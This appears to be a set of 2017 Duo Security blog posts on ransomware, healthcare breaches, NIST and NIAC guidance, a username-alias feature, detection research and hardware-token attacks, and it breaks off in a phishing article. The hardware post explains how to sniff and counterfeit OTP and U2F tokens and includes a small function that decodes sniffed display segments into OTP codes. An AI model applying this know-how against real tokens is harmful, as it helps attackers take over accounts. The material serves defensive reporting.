How are attackers getting access to data? According to the BBC, they’re employing phishing, denial of service and ransomware attacks.

In August, Proofpoint researchers found a new, custom-developed ransomware variant targeting the healthcare and education industries in the U.S. and the U.K.

These narrow, selective phishing campaigns were sent to both individuals and distribution list groups, and were customized to a specific set of users. The ransomware, named Defray by researchers, is spread via a Microsoft Word document attached to email messages.

But this ransomware doesn’t just encrypt data - it can also disable startup recovery and delete volume shadow copies. On Windows 7, it also monitors for and kills any programs running with a GUI.

Best Practices to Protect Against Phishing and Ransomware

The US-CERT (Computer Emergency Readiness Team) has provided some best practices to protect against phishing and ransomware. Here’s a summary of a few:

  • Frequently back up system files; verify backups regularly. Store backups on a separate device that can’t be accessed from the network.
  • Don’t click on links and open attachments in suspicious-looking emails; forward them to your IT or security team.
  • Never give out personal information or information about your organization’s networks or structure. Verify the requestor’s identity directly with their company.
  • Keep your applications, operating system and other software patched with the latest updates to protect against exploits of known vulnerabilities.
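The “verify backups regularly” step above is easy to automate. Here is a minimal sketch that compares a file against its backup copy by SHA-256 digest; the file names are illustrative only.

```python
import hashlib
import tempfile
from pathlib import Path

# Sketch: verify a backup by comparing SHA-256 digests.
# File paths are illustrative placeholders.

def sha256(path):
    """Hex digest of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def backup_is_intact(original, backup):
    """True if the backup byte-for-byte matches the original."""
    return sha256(original) == sha256(backup)

# Demo with two temp files standing in for a file and its backup:
with tempfile.TemporaryDirectory() as d:
    src = Path(d, "report.txt")
    bak = Path(d, "report.txt.bak")
    src.write_text("quarterly numbers")
    bak.write_text("quarterly numbers")
    print(backup_is_intact(src, bak))  # True
```

A real job would walk the backup set on a schedule and alert on any mismatch, rather than checking a single pair of files.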

Mitigate the risk of out-of-date devices with an endpoint and access security solution that gives you visibility and control over unmanaged, personal employee devices. And, reduce the impact of a phishing attempt that steals passwords by protecting your users’ account logins (and access to data) with two-factor authentication (2FA).

Learn more about specific types of remote access threats that target users, devices and remote access services, and how to mitigate them in The Essential Guide to Securing Remote Access.

<![CDATA[The State of the Breach in Healthcare: A Look at 2017 So Far]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/the-state-of-the-breach-in-healthcare-a-look-at-2017-so-far https://duo.com/blog/the-state-of-the-breach-in-healthcare-a-look-at-2017-so-far Industry News Fri, 01 Sep 2017 08:00:00 -0400

As of last week, the Identity Theft Resource Center reported that in 2017 alone, there have been 238 total reported medical/healthcare organization breaches, accounting for 25% of total breaches across all industries.

Here are some more statistics related to why those breaches happened, as well as certain areas to focus on in order to stay secure.

Top 10 Healthcare Breaches of 2017

When categorized by number of records breached, nine of the top 10 healthcare breaches of the year (90%) were due to a “hacking/IT incident.” Eight of the breaches involved hacking of network servers, resulting in 3.6 million affected individual patient records.

From the same dataset, more records were stolen as a result of hacking than all other breach causes (which include physical theft, data disclosure, loss, etc.) combined, as an analysis by Bitglass revealed.

These breaches are listed on the U.S. Dept. of Health and Human Services’ Office for Civil Rights’ Breach Portal as part of the Health Information Technology for Economic and Clinical Health (HITECH) compliance stipulation that requires the agency to publicly list breaches affecting 500 individuals or more.

Healthcare Ranks Low in Security Performance

Based on SecurityScorecard’s 2017 U.S. State and Federal Government Cybersecurity Report, a ranking of industries by “security performance” found healthcare sixth lowest, in the bottom performers group.

When it comes to network security, web application security, patching cadence, social engineering and nearly every other category, healthcare was ranked in the bottom performers group.

Leaked Credentials

The report also took a closer look at all sensitive information exposed as part of a data breach or information leak/dump, mapping the information back to the companies that owned the data or associated email accounts connected to the information.

Once again, healthcare ranked in the bottom performers group for the leaked credentials category. Low performance in this category indicates that employees may be potentially using corporate emails for non-work purposes, and passwords might be reused.

Protecting Against Known Vulnerabilities

Many malware attacks are successful because they exploit weaknesses found in older, unpatched versions of software. So, one of the best ways to ensure protection against these attacks is to patch and update your endpoints on a timely basis.

During our data collection and analysis for The Duo 2017 Trusted Access Report, we found that 76% of healthcare endpoints are running Windows 7, an older version of the Microsoft operating system. Another 3% (compared to 1% overall average) are running XP, an operating system that is no longer updated with new security patches by Microsoft.

In general, we found that across browsers, plugins and operating systems, healthcare is less up to date compared to the overall average of all other industries. That could mean that healthcare may be more susceptible to exploits and malware infection.

Endpoint security solutions can give you visibility into the security health of managed and unmanaged devices, giving you controls to keep risky devices out or prompting your users to update.

That Whole Ransomware Thing

The Solutionary Security Engineering Research Team (SERT) released a report last year that found that healthcare was the most targeted industry by ransomware, accounting for 88% of ransomware detections by the SERT team.

This is no big surprise, especially with the widespread and high-profile infections seen by the wormlike WannaCry ransomware in May, and the destructive NotPetya malware in June. While not the sole infection vector, WannaCry did use a known vulnerability, ETERNALBLUE, to infect Windows computers, install malware and spread itself to other connected machines.

And to protect against a successful exploitation of that vulnerability, you’ll need to patch your Windows machines by applying the MS17-010 update.

Learn more about Duo for Healthcare and Duo for Epic.

<![CDATA[Solving the Identity Crisis with Username Aliases]]> stevew@duosecurity.com(Steve Won) https://duo.com/blog/solving-the-identity-crisis-with-username-aliases https://duo.com/blog/solving-the-identity-crisis-with-username-aliases Product Updates Thu, 31 Aug 2017 08:00:00 -0400


  • Complex customer environments mean multiple usernames for each employee
  • Username Aliases introduces up to four aliases, for a total of five usernames per user object
  • Utilize via the GUI, AD Sync, Admin API, and CSV Upload
  • Feature available for Duo MFA, Duo Access, and Duo Beyond

In the three years I’ve spent at Duo, we’ve seen exponential growth in both the number and size of our customers. Thousands of customers deploy a consistent end user experience with Duo Push in hybrid environments, with on-premises applications like Unix or Windows servers and cloud applications like Expensify and Slack.

As we’ve helped secure customers with tens of thousands of employees, we learned what our customers already knew: enterprise identity is complicated.

Identity Crisis

With all of those different on-premises and cloud applications, customers can’t guarantee that they all speak the same language for usernames. Usernames might be an email address, sAMAccountName, userPrincipalName, or even something custom like an HRID.

So consider an end user’s experience in the morning. They might log into a Windows or Mac laptop with domain\user, and then authenticate into a VPN with a UPN. But then when they open up Slack or another cloud application, they are most likely using sAMAccountName.

Sure, we had simple username normalization, where we cut off prefixes or suffixes and accepted only the bare username. However, that turns out to be insufficient, particularly for organizations with many thousands of users, where almost any alphanumeric combination might be in use on some service.
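That simple normalization looks something like the sketch below - strip a `DOMAIN\` prefix or `@domain` suffix so the common variants collapse to one name. (The function and the example usernames are illustrative, not Duo’s actual implementation.)

```python
# Sketch of simple username normalization: strip a "DOMAIN\" prefix
# or "@domain" suffix so "ACME\jdoe", "jdoe@acme.com", and "jdoe"
# all collapse to one username. Illustrative only - real identities
# often defeat this, which is why aliases are needed.

def normalize(username):
    if "\\" in username:                  # DOMAIN\user
        username = username.split("\\", 1)[1]
    if "@" in username:                   # user@domain (UPN or email)
        username = username.split("@", 1)[0]
    return username.lower()

print(normalize("ACME\\jdoe"))      # jdoe
print(normalize("jdoe@acme.com"))   # jdoe
print(normalize("jdoe"))            # jdoe
```

The failure mode is obvious: if a service uses a custom identifier like an HRID, no amount of prefix/suffix trimming maps it back to `jdoe`.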

Now this was particularly problematic for Duo because our user objects only allowed one username. Our clever Sales Engineers came up with a workaround for customers: creating duplicate accounts for end users, one per username variant; however, this led to greater administrative overhead and pain for our customers.

We knew we could do better, so I’m pleased to announce Username Aliases.

The Solution

Username Aliases introduces four aliases on each user object for a total of five usernames. These objects are editable via the GUI and CSV upload.

Username Aliases

If you use Active Directory, we can now sync four additional columns with the custom attributes feature, so you can pull in any standard or custom attribute type as needed.

Username Aliases Attributes

We also support this via the Admin API, so you can programmatically update all your users.
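As a rough illustration of a programmatic update, the sketch below builds the alias parameter payload for one user. The `alias1`..`alias4` parameter names are an assumption here - check the Admin API documentation for the exact contract - and the request signing and HTTP call are elided.

```python
# Hedged sketch: building an alias payload for an Admin API user
# update. Parameter names alias1..alias4 are assumed; the signed
# HTTP request itself is omitted.

def alias_params(aliases):
    """Map up to four aliases onto alias1..alias4 parameters."""
    if len(aliases) > 4:
        raise ValueError("a user object supports at most four aliases")
    return {f"alias{i}": a for i, a in enumerate(aliases, start=1)}

params = alias_params(["jdoe@acme.com", "ACME\\jdoe", "jdoe"])
print(params)
```

In practice you would iterate over your user directory, compute each user’s known username variants, and send one update per user.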

Generally Available Now

Username Aliases is available for all Duo MFA, Duo Access, and Duo Beyond customers today.

We especially thank all of the customers that gave input and feedback during development and the beta period, so we could help solve this difficult challenge.

<![CDATA[New Critical Infrastructure Security Recommendations from NIAC]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/new-critical-infrastructure-security-recommendations-from-niac https://duo.com/blog/new-critical-infrastructure-security-recommendations-from-niac Industry News Mon, 28 Aug 2017 00:00:00 -0400

A White House advisory group, The President’s National Infrastructure Advisory Council (NIAC), has released an 11-step report urging the Administration to take action to protect against “a watershed, 9/11-level cyber attack.”

NIAC’s assessment is intended to measure how existing federal authorities could better support the cybersecurity of critical infrastructure assets that are at the greatest risk of a cyber attack and could result in catastrophic regional or national effects on public health or safety, economic security or national security.

In Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure, the NIAC outlines recommendations and lists the applicable agencies that must take action to carry out the recommendation. Here’s a summary of the actions:

  1. Establish separate, secure communications networks specifically designated for the most critical cyber networks. Use “dark fiber” networks for critical control system traffic and reserved spectrum for backup communications during emergencies.
  2. Facilitate a private-sector-led pilot of machine-to-machine information sharing technologies to test public-private and company-to-company info sharing of cyber threats at network speed.
  3. Identify best-in-class scanning tools and assessment practices, and work with owners and operators of the most critical networks to scan and sanitize their systems on a voluntary basis.
  4. Strengthen the capabilities of today’s cyber workforce by sponsoring a public-private expert exchange program.
  5. Establish a set of limited time, outcome-based market incentives that encourage owners and operators to upgrade cyber infrastructure, invest in state-of-the-art technologies, and meet industry standards or best practices.
  6. Streamline and expedite security clearance process for owners of the nation’s most critical cyber assets, and expedite the siting, availability, and access of Sensitive Compartmented Information Facilities (SCIFs) to ensure cleared owners and operators can access secure facilities within one hour of a major threat or incident.
  7. Establish clear protocols to rapidly declassify cyber threat info and proactively share it with owners and operators of critical infrastructure, whose actions may provide the nation’s front line of defense against major cyber attacks.
  8. Pilot an operational task force of government, electricity, finance and communications industry experts to take decisive action on the nation’s cyber needs, with the speed and agility required of escalating cyber threats.
  9. Use the national-level GridEx IV exercise to test the detailed execution of Federal authorities and capabilities during a cyber incident, and identify and assign agency-specific recommendations to coordinate and clarify the Federal Government’s unclear response actions.
  10. Establish an optimum cybersecurity governance approach to direct and coordinate the cyber defense of the nation with resources/expertise from across federal agencies.
  11. Task the National Security Advisor to review the recommendations included in this report and within six months, convene a meeting of senior government officials to address barriers to implementation and identify next steps to move forward.

Recommendation 5 is particularly interesting, as it echoes a similar initiative enacted years ago within the healthcare industry to provide incentives to encourage the switch from paper records to digital systems, known as electronic healthcare record systems.

Creating market incentives to drive the adoption of upgraded IT/security infrastructure and to meet industry standards or best practices can assist in keeping critical U.S. infrastructure safe from known vulnerabilities that often exploit weaknesses in legacy systems and out-of-date software to gain access and steal and/or destroy data.

Last week, eight members of the 28-member NIAC resigned, claiming the current administration is not “adequately attentive to the pressing national security matters within the NIAC’s purview” nor “responsive to sound advice received from experts and advisors on these matters,” as stated in a copy of the resignation letter.

<![CDATA[The State of Real-Time Threat Detection]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/the-state-of-real-time-threat-detection https://duo.com/blog/the-state-of-real-time-threat-detection Duo Labs Fri, 25 Aug 2017 08:00:00 -0400

Ransomware has exploded in the past two years, as programs with names like Locky and WannaCry infect hosts in high-profile environments on a weekly basis. From power utilities to healthcare systems, ransomware indiscriminately encrypts all files on the victim’s computer and demands payment (usually in the form of cryptocurrency, like Bitcoin).

Tracking Desktop Ransomware Payments End to End

While the system is encrypting, the victim can potentially save their files by pulling the power cord - if they realize in time that they ran shady software. However, recent work presented at Black Hat 2017 by Elie Bursztein, Kylie McRoberts, and Luca Invernizzi showed that the median ransomware victim has less than one minute to react before all of their files are encrypted:

Ransomware Time from Infection to Encryption Source: elie.net

Worms have always been focused on finding and infecting victims as soon as possible, ideally through systems that require no user interaction. The short time-to-compromise and time-to-spread of these types of malware means threat intelligence feeds have very little time to identify the indicators of compromise and distribute updates before a new variant could potentially infect scores of victims.

One approach that is often used in addition to intel feeds is real-time detection based on the behavior of a program. There have recently been advances in real-time detection presented at top security conferences, and they explore different strategies that may prove useful in other forms of malware detection.

Tools to Fight Ransomware Attacks: ShieldFS

One potentially useful anti-ransomware tool that was presented at Black Hat 2017 was ShieldFS, created and presented by a group of researchers from Politecnico di Milano and Trend Micro. Subtitled, “The Last Word in Ransomware Resilient File Systems,” the insight in this project is applying machine learning (and the right type of machine learning) to operating-system-level file access patterns.

Implemented as a Windows filesystem filter, running in the kernel, ShieldFS isn’t a filesystem proper, but rather adds functionality to the underlying filesystem. Two common challenges in machine learning are feature engineering (how to come up with a list of descriptive “features” about the input) and feature selection (figuring out which of those features productively contribute to generating the correct answer).

Feature engineering in ShieldFS seemed straightforward, since many of the features were simple counts of types of events the filter observed, such as directory listings and writes. They were also fortunate that so many of the features showed obvious qualitative differences between malicious (red) and benign (blue) programs, making feature selection also a high-confidence process:

ShieldFS Features Source: shieldfs.necst.it

This sets the researchers up for success. Using binary inspection (called “static analysis”), they were able to supplement results based on operation statistics (“dynamic analysis”). The team implemented a multitiered machine learning model to preserve long-term trends but also be able to react to new behavioral patterns.

By using a copy-on-write policy, if a process started to exhibit ransomware behavior, they could kill it and restore all the copies. This system detected ransomware with a 96.9% success rate, but even in the other 3.1% of cases the original content was still stored, so 100% of encrypted files could be restored.
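To make the feature idea concrete, here is a toy illustration of behavior-based detection from filesystem event counts. The event stream and threshold are invented for the example; ShieldFS itself uses a multi-tier machine learning model, not a hand-set cutoff.

```python
from collections import Counter

# Toy illustration of count-based behavioral features: flag a process
# whose file activity is dominated by writes and renames, as mass
# encryption tends to be. Threshold and events are invented.

def looks_like_ransomware(events, write_ratio_threshold=0.7):
    """events: list of (process, operation) tuples for one process."""
    counts = Counter(op for _, op in events)
    total = sum(counts.values())
    heavy = counts["write"] + counts["rename"]
    return total > 0 and heavy / total >= write_ratio_threshold

benign = [("editor", "read")] * 8 + [("editor", "write")] * 2
malicious = [("cryptor", "read")] * 2 + [("cryptor", "write")] * 8
print(looks_like_ransomware(benign), looks_like_ransomware(malicious))  # False True
```

The real system’s advantage over a cutoff like this is exactly the point made above: features are learned per tier, and copy-on-write lets it undo damage when the classifier fires late.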

One general takeaway from this project is the value in starting with easy-to-derive features before getting fancy, as is often the temptation in machine learning. Additionally, the biggest downside of dynamic analysis (observing the process) is that it’s hard to undo operations once you decide it’s malicious.

By tweaking the space-efficiency algorithm of copy-on-write, they can completely restore all files to the state they were in when the process started, mitigating this downside - while avoiding the performance and accuracy penalty of stalling execution to statically analyze the binary, a common anti-virus/endpoint-protection technique.

3D Printing Security Concerns

In a very different context, additive manufacturing, i.e., “3D printing,” a concern about malware has arisen, given that the printers are IoT devices. We see security vulnerabilities with embedded hardware and IoT devices all the time, such as Duo Labs’ recent work attacking a “smart” drill.

At USENIX Security 2017 this past week, a team from Georgia Tech and Rutgers presented a solution to this problem, titled, “See No Evil, Hear No Evil, Feel No Evil, Print No Evil? Malicious Fill Patterns Detection in Additive Manufacturing”. We recently criticized a solution that relied on the security of an open hardware project for just pushing the question of trust down a level, onto the physical components that the firmware runs on.

The USENIX work entirely set aside this “turtles all the way down” approach to trust, using side-channels to observe the behavior of the 3D printer and compare it to a model of what it should be doing. They establish three layers of verification that detect whether the printer or the controlling computer is compromised (or broken): acoustic output, visual progress, and embedding nanoparticles in the materials so that fraudulent prints would look significantly different when imaged via, for example, a CT scan.

By printing the example prosthesis under assumed-good conditions, they were able to train machine learning models about what information legitimate printing leaked via these side channels. Using three different models of printer, they were able to achieve 100% accuracy at detecting modified printer behavior in real-time.

At the collocated Workshop On Offensive Technologies (WOOT), a different team, from Ben-Gurion University of the Negev, University of South Alabama, and Singapore University of Technology and Design, presented precisely such an attack. This paper, “dr0wned – Cyber-Physical Attack with Additive Manufacturing”, presented a start-to-finish attack on the reliability of a quadcopter rotor.

The attack started with an exploit for a WinRAR vulnerability, disguised as a PDF. The vulnerability had already been patched, but the team made the sadly reasonable assumption that the user doesn’t routinely update their computer. They also turned the exploit into a worm, which scans for design files with the targeted geometry and comments out critical lines to sabotage the parts. Successful sabotage of this type requires that the part hold up to visual inspection and some amount of physical testing:

Sabotaged 3D-Printed Propellers Source: usenix.net

In the above photo, the top propeller is the intended device, while the bottom one has been sabotaged. Their approach to sabotage is two-fold: inserting cavities at structurally weak points, and changing the printer’s path so that, instead of being printed in a continuous path across the boundary between the blades and the cap, the cap and two blades are printed as three separate parts that are stuck together, which creates a significant structural weakness.

In both lab and real-world testing, the sabotaged propeller blades eventually flew off when they rotated fast enough:

Broken 3D-Printed Propellers

The authors of this attack compared it to the previous state of the art in defense, which used acoustic detection methods with only a 77% success rate; they deem this “insufficient” for detection of this attack, which certainly seems like taking a rosy view. It would be fascinating to see these two research projects pitted against each other; the defenders are likely to have substantial success, because this attack relies on dramatically changing the path of the printer. The approach that used gold microrods in the material and imaged the result with a CT scan seems likely to detect substantial path changes, since this is precisely the attack the imaging was intended to detect.

In addition to the security properties tested by the detection work, it also provides a valuable quality analysis tool. By evaluating the printers as they print, these models can prevent the waste of valuable source material by halting the job as soon as the machine learning models indicate that the printer is malfunctioning.

While infosec defenders normally think of side channels as something to loathe, since they are how attackers can get information, in this case the saying “the best defense is a good offense” holds true. By acting as an “attacker,” the producer of the plans is able to gain information about what the printer is actually doing, providing confidence in the integrity of the results. Moreover, it accomplishes this without having to place trust in any of the production hardware.

These are just two examples of advances in real-time detection of malicious activity. When attacks on hardware erode the trust we in the software world place in it, new challenges arise that can’t be solved simply by using signature-based detection. In addition to the advances these research projects contributed to the individual fields of ransomware detection and the detection of malfunctioning additive manufacturing tools, respectively, they discuss techniques that can apply to other machine learning scenarios in security.

Observing the actual effects of program execution (whether it be 3-D printer movements or filesystem actions) may prove to be more efficient than trying to analyze and reason about a program or data file.

<![CDATA[NIST’s New Security and Privacy Controls For IoT, MFA and SSO]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nists-new-security-and-privacy-controls-for-iot-mfa-and-sso https://duo.com/blog/nists-new-security-and-privacy-controls-for-iot-mfa-and-sso Industry News Tue, 22 Aug 2017 00:00:00 -0400

NIST has released the fifth revision of the Security and Privacy Controls draft of Special Publication 800-53 (PDF), now available for comments through September 12, 2017. The publication was last fully rewritten in 2013.

In this draft, NIST has incorporated state-of-the-practice controls based on new threat intelligence and changed the structure of the controls to make them more outcome-based. They’ve also consolidated and integrated privacy controls into the security controls, and clarified the relationship between security and privacy to improve control selection.

While the primary audience for this publication is federal agencies, they acknowledge that “different communities of interest” such as systems engineers, software developers, enterprise architects and business owners might want to use similar controls.

As a result, NIST has dropped “federal” from the title, as the document was formerly named, Security and Privacy Controls for Federal Information Systems and Organizations. NIST Fellow Ron Ross told Cyberscoop:

“The reality is, today we’re all of us — federal, state and local government and the private sector — using the same technologies … and facing the same [cyber] threats.”

Security and Privacy in an Interconnected World

NIST refers to the need to strengthen underlying infrastructure, information systems, components and services that support this new, interconnected world - specifically calling out the need for security and privacy controls in cloud and mobile systems and for Internet of Things (IoT) devices. As Draft NIST SP 800-53, Revision 5 puts it:

“As we push computers to “the edge” building an increasingly complex world of interconnected information systems and devices, security and privacy continue to dominate the national dialog.”

According to CPOMagazine, this is the first version of the Security and Privacy Controls that addresses how IoT is impacted by remote sensors and media collection devices (cameras, recorders and voice-activated controls). These are all components of IoT devices and systems, such as cars and traffic monitoring systems.

New Control Enhancements for Password-Based Authentication

While revision four required enforcing minimum password complexity (including uppercase and lowercase letters, numbers, special characters, etc.), draft five notably removes that requirement, focusing instead on allowing users to select long passwords/passphrases (page 113).
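The shift can be sketched in a few lines of Python. The 8-to-64-character bounds and the tiny breached-password blocklist below are illustrative stand-ins for the publication’s actual parameters, not a literal implementation of the guidance.

```python
import re

def old_style_ok(pw):
    """Rev. 4-era composition rules: length plus mixed case, digit, symbol."""
    return (len(pw) >= 8
            and bool(re.search(r"[a-z]", pw))
            and bool(re.search(r"[A-Z]", pw))
            and bool(re.search(r"\d", pw))
            and bool(re.search(r"[^\w\s]", pw)))

def new_style_ok(pw, breached=frozenset({"password", "p@ssw0rd1"})):
    """Draft-5 style: favor length, and reject known-compromised values."""
    return 8 <= len(pw) <= 64 and pw.lower() not in breached
```

Under these checks, a long passphrase like “correct horse battery staple” fails the old composition rules but passes the new one, while a complex-looking “P@ssw0rd1” does the opposite.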

Read more about the password recommendation updates in the final version of SP 800-63B: Authentication & Lifecycle Management in another article I wrote, NIST Update: Passphrases In, Complex Passwords Out.

Security Benefits of Combining MFA & SSO

Within the Identification and Authentication control, the document carries on its recommendation to implement multi-factor authentication (MFA) for access to non-privileged accounts.

NIST also provides more supplemental guidance on the sub-control for single sign-on (SSO), commenting on SSO’s ability to “improve system security, for example by providing the ability to add multi-factor authentication for applications that may not be able to natively support this function. This situation may occur in legacy applications for systems.”

This shows NIST’s acknowledgement of the benefits of combining the productivity and usability gains of SSO with the strong authentication security provided by MFA - not just for federal agencies, but for the many other industries that can leverage the same technology and systems to protect access to their applications.

Learn more about how Duo combines secure single sign-on and multi-factor authentication to ensure Trusted Users for organizations of every size, in every industry.

<![CDATA[Dissecting Security Hardware at Black Hat and DEF CON]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/dissecting-security-hardware-at-black-hat-and-def-con https://duo.com/blog/dissecting-security-hardware-at-black-hat-and-def-con Duo Labs Fri, 18 Aug 2017 08:00:00 -0400

One in seven USB drives containing company data is lost or stolen, according to a survey recently conducted by Google’s Security, Privacy and Abuse Research team. A seemingly straightforward mitigation would be to mandate that all USB drives with corporate data use hardware-based encryption.

However, this still means that one in seven of those drives are going to get lost or stolen, so administrators have to implicitly place a lot of trust in that hardware. We also place trust in other secure hardware devices, like OTP tokens (e.g., RSA tokens) and Universal 2nd Factor (U2F) tokens (e.g., Yubico’s YubiKeys).

Due to the difficulty of verifying a device’s security properties, purchasing decisions often have to be made based on secondary factors, like vendor reputation. This creates an environment where software-oriented people simply assume hardware is secure, because life becomes much more difficult if that assumption is questioned. Unfortunately, the reader’s life is about to become much more difficult.

Auditing USB Key Hardware Components

Elie Bursztein (@elie), Jean-Michel Picod (@jmichel_p), and Rémi Audebert (@halfr) recently presented “Attacking Encrypted USB Keys the Hard(Ware) Way” at Black Hat 2017, where they took on the challenging task of auditing the hardware components of encrypted USB keys. They established five possible types of weaknesses and demonstrated exploits of each type. This structure made the talk stand out from the field, as it was accessible even to those who weren’t familiar with hardware security.

Secure Hardware

The number of times the word “FAIL” appeared in their slides is certainly indicative of the state of cryptographic hardware implementations. The most impactful takeaway is that they found that different models from a common manufacturer might have substantially different security postures—one might be suitable to protect against all but state-level actors, while another might be built such that even an opportunistic hacker can extract your data.

Vendor reputation is, apparently, not a reliable proxy for security properties, which means there’s even less information for buyers to rely on when purchasing. Instead, the speakers concluded that NIST standards provide useful information - failing to conform to them is likely a bad sign - but conformance isn’t sufficient to actually make claims about the security of a device.

This is left as an open question: we need better standards, so does anybody want to make them (and, more onerously, get everyone to agree on them)?

Counterfeiting Security Tokens

While the Google team pulled apart USB drives to audit them, Joe FitzPatrick (@securelyfitz) and Michael Leibowitz (@r00tkillah) detailed their efforts at producing counterfeit security tokens at DEF CON 25, in an entertaining talk titled, “Secure Tokin' and Doobiekeys: How to Roll Your Own Counterfeit Hardware Security Devices”.

The first victim was an OTP token, similar to an RSA token. They decided to completely ignore the secure hardware that stored the cryptographic seed, since that’s intended to be hard to break into. In the world of copyright law, there’s a concept known as the “analog loophole:” you can have all the DRM in the world, but at some point, you have to output an analog signal, i.e., sound or light waves, and those can be captured.

This team took a similar approach, and intercepted the signal going to the seven-segment LCD display. By waiting for all the segments to light up as different OTP codes are displayed, they were able to deduce that a given signal on a given pin meant that a particular segment was going to turn on or off.

By packing this detection logic and a Bluetooth transmitter into the token’s housing, they could broadcast the state of the display without ever having to semantically understand what the current OTP code was. This attack would require access to the victim’s OTP token, so the threat model requires an attacker to have physical access to the token for at least several minutes, which, if you’re taking good care of your tokens, would probably only happen when you’re asleep.
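The decoding step is strikingly simple, which a rough Python sketch can show. Once you know which pin drives which segment, the segment pattern alone reveals each digit; no cryptography is involved. The a-through-g bit order below is a common seven-segment convention, not the token’s actual pinout.

```python
# Map each 7-bit segment pattern (bits a..g, MSB = segment a) to its digit.
SEGMENTS_TO_DIGIT = {
    0b1111110: "0", 0b0110000: "1", 0b1101101: "2", 0b1111001: "3",
    0b0110011: "4", 0b1011011: "5", 0b1011111: "6", 0b1110000: "7",
    0b1111111: "8", 0b1111011: "9",
}

def decode_display(sampled_patterns):
    """Turn a stream of sniffed per-digit segment bitmasks into the OTP code."""
    return "".join(SEGMENTS_TO_DIGIT[p] for p in sampled_patterns)
```

This is why the attack never needs to touch the secure element: the “analog loophole” means the code is fully recoverable from the wires driving the display.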

A successful attack would allow malicious attackers within Bluetooth range (at most, 100 meters if you have line-of-sight view of the token) to know your OTP codes as they were generated. Then, all they would have to do is phish your login credentials to gain persistent access to the account the token protects.

Their second hack was producing a counterfeit YubiKey U2F token. The advantage in doing so is that the “identity” of the key is burned in when it ships, and the security relies on that staying secret. If a malicious actor is able to retain the secret information that they burn into a fake YubiKey, and then convince a user that it’s a legitimate YubiKey, they can later impersonate that token.

FitzPatrick and Leibowitz showed their incremental attempts at shrinking their PCB and components to fit into a YubiKey form factor. They were able to 3D print a YubiKey replica that could hold their counterfeit circuit board, and demonstrated that Yubico’s tools treated it like any other YubiKey. This attack could be carried out in the supply chain, by swapping out authentic YubiKeys for these fakes, but supply chain interference is always a difficult task. A more feasible scenario, if the attacker has specific targets, would be to hand them out as a “public service” at an infosec event.

Seeking Hardware Transparency

These attacks certainly serve to instill some distrust of “secure hardware,” which raises the question of: “What do we do when we don’t trust the circuitry and firmware?” One possible approach using open-source hardware was described by 0ctane in their DEF CON talk, “Untrustworthy Hardware and How To Fix It: Seeking Hardware Transparency”.

Often, the notion of “open-source hardware” sounds like a great idea, except for the not-so-tiny complication of actually producing the hardware from the specifications. Recent advances in consumer-grade CNC machines have started to make homemade printed circuit boards (PCBs) feasible, but it’s still time- and material-intensive to iterate.

Field-programmable gate arrays (FPGAs) are one option in this situation. An FPGA is a piece of hardware that can best be likened to a software-defined microchip: the user sends a definition of the circuitry they want, and the FPGA configures itself to implement that hardware definition. They are usually used for prototyping, debugging hardware, or performing complex digital signal processing. The curious reader may be interested in taking a deeper dive into what FPGAs actually are, but that’s beyond the scope of this discussion.
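As a loose analogy (real FPGA cells are far more elaborate), each logic cell behaves like a small lookup table (LUT) whose contents define which gate it implements, so loading a different configuration turns the same hardware into a different circuit:

```python
def make_lut(truth_table):
    """A 2-input 'logic cell': its behavior is entirely its 4-entry table."""
    return lambda a, b: truth_table[(a << 1) | b]

# The same cell, "reconfigured" by loading different table contents:
xor_gate = make_lut([0, 1, 1, 0])   # configured as XOR
nand_gate = make_lut([1, 1, 1, 0])  # configured as NAND
```

Chaining thousands of such configurable cells together is, roughly, how an FPGA can be told to behave like an entire CPU.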

0ctane proposes a cryptographic use: simulating a particular definition of a trusted CPU (in this case, OpenRISC), and running Linux and the desired cryptographic software on top of this simulated processor. The downside to using FPGAs is that this customizability comes at the cost of speed when compared to silicon CPUs. Top-of-the-line FPGAs still run slower, due to the need to buffer input and output between cells rather than having the circuitry optimally laid out, as it is in a silicon chip.

For this application, however, that might be an entirely acceptable tradeoff: slower operation and computation in exchange for knowing that your code is running on a trusted stack, from the hardware up. That said, there are some unanswered questions as to how sound the approach is. It’s unclear to the author whether it is harder for an attacker to surreptitiously insert malicious logic into an FPGA than into a CPU, since this approach requires trusting the FPGA and its programmer software (which itself runs on an untrusted CPU).

There’s also an assumption made that OpenRISC is itself more secure than an Intel or AMD x86 chip. As we’ve seen in case after case, just being open-source doesn’t mean that software is more secure. It does provide visibility that you don’t otherwise have, but you either have to read all the software and convince yourself of its security properties, or you have to also place trust in the OpenRISC project to make a secure processor. 0ctane’s proposal is an interesting one, but it needs more data and discussion to be a viable approach; we look forward to hearing more from them in the future.

FPGAs aren’t the solution to all of our concerns about hardware security, and you have to place your trust somewhere unless you can oversee the entire design and supply chain. This approach could prove valuable in the future when trusted hardware is essential, such as for a standalone code-signing computer with its keys in a hardware security module - devices designed to break before revealing their private information. There are definitely issues with this solution as it stands, though; hardware hackers are a tenacious bunch, as when Mikhail on our research team hacked our office doors. In reality, there doesn’t seem to be much of a supply-chain threat if you’re buying your hardware from a trusted supplier. However, you might want to think twice before using a YubiKey that somebody hands you at a crypto meetup...

<![CDATA[Phishing Emails Leverage Recently Patched Windows Vulnerability]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/phishing-emails-leverage-recently-patched-windows-vulnerability https://duo.com/blog/phishing-emails-leverage-recently-patched-windows-vulnerability Industry News Thu, 17 Aug 2017 00:00:00 -0400

A recently patched, high-severity Windows vulnerability, CVE-2017-0199, is being used in phishing attacks to deliver malware to users.

CVE-2017-0199 is a flaw in the Windows Object Linking and Embedding (OLE) interface used by Microsoft Office, allowing an attacker to take control of systems, steal or destroy data, and retrieve malicious files from a remote server to install on a victim’s computer.

In a report from Kaspersky Lab, the number of attacked Microsoft Office users rose to 1.5 million in Q2 of this year. They found that 71% of all attacks on Microsoft Office users were carried out using this specific vulnerability, despite it being patched in April.

Targeting Electronics Manufacturing Companies

A new attack in the wild is using the vulnerability to target mainly electronics manufacturing companies. A phishing email appeared to be sent from a cable manufacturing provider, containing a malicious PowerPoint Slideshow (.ppsx) attachment, according to Trend Micro researchers.

Phishing Email Disguised as Purchase Order

Source: Trend Micro

